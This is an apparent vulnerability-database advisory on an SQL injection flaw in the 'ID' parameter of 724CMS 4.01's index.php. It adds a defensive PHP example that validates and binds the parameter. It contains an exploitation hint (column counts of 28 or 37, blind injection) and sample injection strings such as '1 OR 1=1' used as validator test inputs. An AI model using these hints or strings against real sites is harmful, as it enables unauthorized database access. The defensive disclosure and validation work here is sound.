Vendor: 724CMS
By: Lidloses_Auge
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: 724CMS
Affected Version From: 04.01
Affected Version To: 04.01
Patch Exists: NO
Related CWE: N/A
CPE: 724cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
724CMS <= 4.01 Enterprise - SQL Injection Vulnerability
724CMS version 4.01 Enterprise is vulnerable to SQL injection. The vulnerability exists in the 'ID' GET parameter of the 'index.php' document. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The number of columns isn't always 28; in some cases it can also be about 37, so check before you try. Some of the injections are blind.
Mitigation:
Input validation should be used to prevent SQL injection attacks. Sanitize all user input and escape special characters.
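One way to apply this mitigation to a numeric 'ID' request parameter, shown as an added example that is not 724CMS code and not part of the original advisory. The `pages` table, the function names and the sample inputs are assumptions constructed for illustration (PHP 8 with the pdo_sqlite extension).

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the CMS database: in-memory SQLite, hypothetical schema.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO pages (id, title) VALUES (1, 'Home'), (2, 'Contact')");

/** Accept only a plain positive decimal integer; everything else is rejected. */
function parsePageId(mixed $raw): ?int
{
    // Rejects arrays (ID[]=1), signs, whitespace, quotes and any SQL text.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Look up a page with a bound parameter, never by string concatenation. */
function fetchPageTitle(PDO $pdo, mixed $rawId): ?string
{
    $id = parsePageId($rawId);
    if ($id === null) {
        return null; // caller should answer 400 and log the request
    }
    $stmt = $pdo->prepare('SELECT title FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $title = $stmt->fetchColumn();
    return $title === false ? null : (string) $title;
}

// Constructed inputs standing in for $_GET['ID'].
$samples = ['1', '2', '0', '-1', '1 OR 1=1', "1'", ['1'], '99999999999'];
foreach ($samples as $raw) {
    $title = fetchPageTitle($pdo, $raw);
    printf("%-14s => %s\n", json_encode($raw), $title ?? 'rejected or not found');
}
```

Validation and binding are layered on purpose: the allow-list check rejects malformed values before they reach the database, and the bound parameter keeps the query structure fixed even if a validation rule is later loosened.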